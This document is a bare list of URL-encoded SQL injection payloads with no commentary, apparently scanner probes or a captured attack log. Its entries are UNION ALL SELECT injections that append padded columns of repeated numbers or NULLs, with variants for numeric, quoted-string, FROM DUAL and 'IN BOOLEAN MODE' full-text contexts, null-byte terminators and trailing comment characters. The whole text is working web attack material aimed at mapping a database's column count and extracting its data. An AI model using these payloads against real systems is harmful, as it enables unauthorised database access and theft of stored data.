-9103%20%2B%20%28SELECT%203268%20FROM%20DUAL%20WHERE%202493%3D2493%20UNION%20ALL%20SELECT%202493%2C%202493%2C%202493%2C%202493%2C%202493%2C%202493%2C%202493%2C%202493%2C%202493%2C%202493%2C%202493%2C%202493%2C%202493%2C%202493%2C%202493%2C%202493%2C%202493%2C%202493%2C%202493%00%20%29 -5171%20%2B%20%28SELECT%201961%20FROM%20DUAL%20WHERE%202991%3D2991%20UNION%20ALL%20SELECT%202991%2C%202991%2C%202991%2C%202991%2C%202991%2C%202991%2C%202991%2C%202991%2C%202991%2C%202991%2C%202991%2C%202991%2C%202991%2C%202991%2C%202991%2C%202991%2C%202991%2C%202991%2C%202991%2C%202991%00%20%29 -7792%20%2B%20%28SELECT%207707%20WHERE%207874%3D7874%20UNION%20ALL%20SELECT%207874%2C%207874%2C%207874%2C%207874%2C%207874%2C%207874%2C%207874%2C%207874%2C%207874%2C%207874%2C%207874%00%20%29 -3098%20%2B%20%28SELECT%208033%20WHERE%208051%3D8051%20UNION%20ALL%20SELECT%208051%2C%208051%2C%208051%2C%208051%2C%208051%2C%208051%2C%208051%2C%208051%2C%208051%2C%208051%2C%208051%2C%208051%00%20%29 -8186%20%2B%20%28SELECT%202728%20WHERE%207782%3D7782%20UNION%20ALL%20SELECT%207782%2C%207782%2C%207782%2C%207782%2C%207782%2C%207782%2C%207782%2C%207782%2C%207782%2C%207782%2C%207782%2C%207782%2C%207782%00%20%29 -9618%20%2B%20%28SELECT%202803%20WHERE%207204%3D7204%20UNION%20ALL%20SELECT%207204%2C%207204%2C%207204%2C%207204%2C%207204%2C%207204%2C%207204%2C%207204%2C%207204%2C%207204%2C%207204%2C%207204%2C%207204%2C%207204%00%20%29 -7498%20%2B%20%28SELECT%208043%20WHERE%209799%3D9799%20UNION%20ALL%20SELECT%209799%2C%209799%2C%209799%2C%209799%2C%209799%2C%209799%2C%209799%2C%209799%2C%209799%2C%209799%2C%209799%2C%209799%2C%209799%2C%209799%2C%209799%00%20%29 -9638%20%2B%20%28SELECT%208070%20WHERE%202404%3D2404%20UNION%20ALL%20SELECT%202404%2C%202404%2C%202404%2C%202404%2C%202404%2C%202404%2C%202404%2C%202404%2C%202404%2C%202404%2C%202404%2C%202404%2C%202404%2C%202404%2C%202404%2C%202404%00%20%29 -6935%20%2B%20%28SELECT%202888%20WHERE%203751%3D3751%20UNION%20ALL%20SELECT%203751%2C%203751%2C%203751%2C%203751%2C%203751%2C%203751%2C%203751%2C%203751%2C%203751%2C%203751%2C%203751%2C%203751%2C%203751%2C%203751%2C%203751%2C%203751%2C%203751%00%20%29 -4619%20%2B%20%28SELECT%202887%20WHERE%209431%3D9431%20UNION%20ALL%20SELECT%209431%2C%209431%2C%209431%2C%209431%2C%209431%2C%209431%2C%209431%2C%209431%2C%209431%2C%209431%2C%209431%2C%209431%2C%209431%2C%209431%2C%209431%2C%209431%2C%209431%2C%209431%00%20%29 -8219%20%2B%20%28SELECT%209831%20WHERE%207067%3D7067%20UNION%20ALL%20SELECT%207067%2C%207067%2C%207067%2C%207067%2C%207067%2C%207067%2C%207067%2C%207067%2C%207067%2C%207067%2C%207067%2C%207067%2C%207067%2C%207067%2C%207067%2C%207067%2C%207067%2C%207067%2C%207067%00%20%29 -4035%20%2B%20%28SELECT%208899%20WHERE%209025%3D9025%20UNION%20ALL%20SELECT%209025%2C%209025%2C%209025%2C%209025%2C%209025%2C%209025%2C%209025%2C%209025%2C%209025%2C%209025%2C%209025%2C%209025%2C%209025%2C%209025%2C%209025%2C%209025%2C%209025%2C%209025%2C%209025%2C%209025%00%20%29 -2498%27%20%2B%20%28SELECT%20%27jMMb%27%20FROM%20DUAL%20WHERE%206969%3D6969%20UNION%20ALL%20SELECT%206969%2C%206969%2C%206969%2C%206969%2C%206969%2C%206969%2C%206969%2C%206969%2C%206969%2C%206969%2C%206969%00%20%29%20%2B%20%27 -9714%27%20%2B%20%28SELECT%20%27OoRT%27%20FROM%20DUAL%20WHERE%201238%3D1238%20UNION%20ALL%20SELECT%201238%2C%201238%2C%201238%2C%201238%2C%201238%2C%201238%2C%201238%2C%201238%2C%201238%2C%201238%2C%201238%2C%201238%00%20%29%20%2B%20%27 -3790%27%20%2B%20%28SELECT%20%27dOvN%27%20FROM%20DUAL%20WHERE%205753%3D5753%20UNION%20ALL%20SELECT%205753%2C%205753%2C%205753%2C%205753%2C%205753%2C%205753%2C%205753%2C%205753%2C%205753%2C%205753%2C%205753%2C%205753%2C%205753%00%20%29%20%2B%20%27 -6816%27%20%2B%20%28SELECT%20%27XlrG%27%20FROM%20DUAL%20WHERE%202879%3D2879%20UNION%20ALL%20SELECT%202879%2C%202879%2C%202879%2C%202879%2C%202879%2C%202879%2C%202879%2C%202879%2C%202879%2C%202879%2C%202879%2C%202879%2C%202879%2C%202879%00%20%29%20%2B%20%27 -6096%27%20%2B%20%28SELECT%20%27Qibq%27%20FROM%20DUAL%20WHERE%209227%3D9227%20UNION%20ALL%20SELECT%209227%2C%209227%2C%209227%2C%209227%2C%209227%2C%209227%2C%209227%2C%209227%2C%209227%2C%209227%2C%209227%2C%209227%2C%209227%2C%209227%2C%209227%00%20%29%20%2B%20%27 -4427%27%20%2B%20%28SELECT%20%27iXqL%27%20FROM%20DUAL%20WHERE%205983%3D5983%20UNION%20ALL%20SELECT%205983%2C%205983%2C%205983%2C%205983%2C%205983%2C%205983%2C%205983%2C%205983%2C%205983%2C%205983%2C%205983%2C%205983%2C%205983%2C%205983%2C%205983%2C%205983%00%20%29%20%2B%20%27 -1454%27%20%2B%20%28SELECT%20%27dzQM%27%20FROM%20DUAL%20WHERE%201430%3D1430%20UNION%20ALL%20SELECT%201430%2C%201430%2C%201430%2C%201430%2C%201430%2C%201430%2C%201430%2C%201430%2C%201430%2C%201430%2C%201430%2C%201430%2C%201430%2C%201430%2C%201430%2C%201430%2C%201430%00%20%29%20%2B%20%27 -9400%27%20%2B%20%28SELECT%20%27YuyV%27%20FROM%20DUAL%20WHERE%208700%3D8700%20UNION%20ALL%20SELECT%208700%2C%208700%2C%208700%2C%208700%2C%208700%2C%208700%2C%208700%2C%208700%2C%208700%2C%208700%2C%208700%2C%208700%2C%208700%2C%208700%2C%208700%2C%208700%2C%208700%2C%208700%00%20%29%20%2B%20%27 -4670%27%20%2B%20%28SELECT%20%27Bbqk%27%20FROM%20DUAL%20WHERE%202209%3D2209%20UNION%20ALL%20SELECT%202209%2C%202209%2C%202209%2C%202209%2C%202209%2C%202209%2C%202209%2C%202209%2C%202209%2C%202209%2C%202209%2C%202209%2C%202209%2C%202209%2C%202209%2C%202209%2C%202209%2C%202209%2C%202209%00%20%29%20%2B%20%27 -4798%27%20%2B%20%28SELECT%20%27SHfJ%27%20FROM%20DUAL%20WHERE%202504%3D2504%20UNION%20ALL%20SELECT%202504%2C%202504%2C%202504%2C%202504%2C%202504%2C%202504%2C%202504%2C%202504%2C%202504%2C%202504%2C%202504%2C%202504%2C%202504%2C%202504%2C%202504%2C%202504%2C%202504%2C%202504%2C%202504%2C%202504%00%20%29%20%2B%20%27 -6028%27%20%2B%20%28SELECT%20%27whff%27%20WHERE%201126%3D1126%20UNION%20ALL%20SELECT%201126%2C%201126%2C%201126%2C%201126%2C%201126%2C%201126%2C%201126%2C%201126%2C%201126%2C%201126%2C%201126%00%20%29%20%2B%20%27 -8153%27%20%2B%20%28SELECT%20%27BvQh%27%20WHERE%206574%3D6574%20UNION%20ALL%20SELECT%206574%2C%206574%2C%206574%2C%206574%2C%206574%2C%206574%2C%206574%2C%206574%2C%206574%2C%206574%2C%206574%2C%206574%00%20%29%20%2B%20%27 -7613%27%20%2B%20%28SELECT%20%27QlZX%27%20WHERE%203036%3D3036%20UNION%20ALL%20SELECT%203036%2C%203036%2C%203036%2C%203036%2C%203036%2C%203036%2C%203036%2C%203036%2C%203036%2C%203036%2C%203036%2C%203036%2C%203036%00%20%29%20%2B%20%27 -5681%27%20%2B%20%28SELECT%20%27JDOm%27%20WHERE%201864%3D1864%20UNION%20ALL%20SELECT%201864%2C%201864%2C%201864%2C%201864%2C%201864%2C%201864%2C%201864%2C%201864%2C%201864%2C%201864%2C%201864%2C%201864%2C%201864%2C%201864%00%20%29%20%2B%20%27 -1178%27%20%2B%20%28SELECT%20%27cjGM%27%20WHERE%207273%3D7273%20UNION%20ALL%20SELECT%207273%2C%207273%2C%207273%2C%207273%2C%207273%2C%207273%2C%207273%2C%207273%2C%207273%2C%207273%2C%207273%2C%207273%2C%207273%2C%207273%2C%207273%00%20%29%20%2B%20%27 -8868%27%20%2B%20%28SELECT%20%27JTVA%27%20WHERE%209762%3D9762%20UNION%20ALL%20SELECT%209762%2C%209762%2C%209762%2C%209762%2C%209762%2C%209762%2C%209762%2C%209762%2C%209762%2C%209762%2C%209762%2C%209762%2C%209762%2C%209762%2C%209762%2C%209762%00%20%29%20%2B%20%27 -5930%27%20%2B%20%28SELECT%20%27jrXR%27%20WHERE%206237%3D6237%20UNION%20ALL%20SELECT%206237%2C%206237%2C%206237%2C%206237%2C%206237%2C%206237%2C%206237%2C%206237%2C%206237%2C%206237%2C%206237%2C%206237%2C%206237%2C%206237%2C%206237%2C%206237%2C%206237%00%20%29%20%2B%20%27 -3450%27%20%2B%20%28SELECT%20%27OOSl%27%20WHERE%205866%3D5866%20UNION%20ALL%20SELECT%205866%2C%205866%2C%205866%2C%205866%2C%205866%2C%205866%2C%205866%2C%205866%2C%205866%2C%205866%2C%205866%2C%205866%2C%205866%2C%205866%2C%205866%2C%205866%2C%205866%2C%205866%00%20%29%20%2B%20%27 -5052%27%20%2B%20%28SELECT%20%27THuV%27%20WHERE%204515%3D4515%20UNION%20ALL%20SELECT%204515%2C%204515%2C%204515%2C%204515%2C%204515%2C%204515%2C%204515%2C%204515%2C%204515%2C%204515%2C%204515%2C%204515%2C%204515%2C%204515%2C%204515%2C%204515%2C%204515%2C%204515%2C%204515%00%20%29%20%2B%20%27 -2424%27%20%2B%20%28SELECT%20%27RgwF%27%20WHERE%209123%3D9123%20UNION%20ALL%20SELECT%209123%2C%209123%2C%209123%2C%209123%2C%209123%2C%209123%2C%209123%2C%209123%2C%209123%2C%209123%2C%209123%2C%209123%2C%209123%2C%209123%2C%209123%2C%209123%2C%209123%2C%209123%2C%209123%2C%209123%00%20%29%20%2B%20%27 -3563%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%205642%2C%205642%2C%205642%2C%205642%2C%205642%2C%205642%2C%205642%2C%205642%2C%205642%2C%205642%2C%205642%00%20%23 -7642%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%206860%2C%206860%2C%206860%2C%206860%2C%206860%2C%206860%2C%206860%2C%206860%2C%206860%2C%206860%2C%206860%2C%206860%00%20%23 -4227%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%202562%2C%202562%2C%202562%2C%202562%2C%202562%2C%202562%2C%202562%2C%202562%2C%202562%2C%202562%2C%202562%2C%202562%2C%202562%00%20%23 -7136%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%205569%2C%205569%2C%205569%2C%205569%2C%205569%2C%205569%2C%205569%2C%205569%2C%205569%2C%205569%2C%205569%2C%205569%2C%205569%2C%205569%00%20%23 -5680%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%206060%2C%206060%2C%206060%2C%206060%2C%206060%2C%206060%2C%206060%2C%206060%2C%206060%2C%206060%2C%206060%2C%206060%2C%206060%2C%206060%2C%206060%00%20%23 -4896%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%204562%2C%204562%2C%204562%2C%204562%2C%204562%2C%204562%2C%204562%2C%204562%2C%204562%2C%204562%2C%204562%2C%204562%2C%204562%2C%204562%2C%204562%2C%204562%00%20%23 -8567%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%201807%2C%201807%2C%201807%2C%201807%2C%201807%2C%201807%2C%201807%2C%201807%2C%201807%2C%201807%2C%201807%2C%201807%2C%201807%2C%201807%2C%201807%2C%201807%2C%201807%00%20%23 -4422%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%207876%2C%207876%2C%207876%2C%207876%2C%207876%2C%207876%2C%207876%2C%207876%2C%207876%2C%207876%2C%207876%2C%207876%2C%207876%2C%207876%2C%207876%2C%207876%2C%207876%2C%207876%00%20%23 -9436%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%203083%2C%203083%2C%203083%2C%203083%2C%203083%2C%203083%2C%203083%2C%203083%2C%203083%2C%203083%2C%203083%2C%203083%2C%203083%2C%203083%2C%203083%2C%203083%2C%203083%2C%203083%2C%203083%00%20%23 -8003%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%204334%2C%204334%2C%204334%2C%204334%2C%204334%2C%204334%2C%204334%2C%204334%2C%204334%2C%204334%2C%204334%2C%204334%2C%204334%2C%204334%2C%204334%2C%204334%2C%204334%2C%204334%2C%204334%2C%204334%00%20%23 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 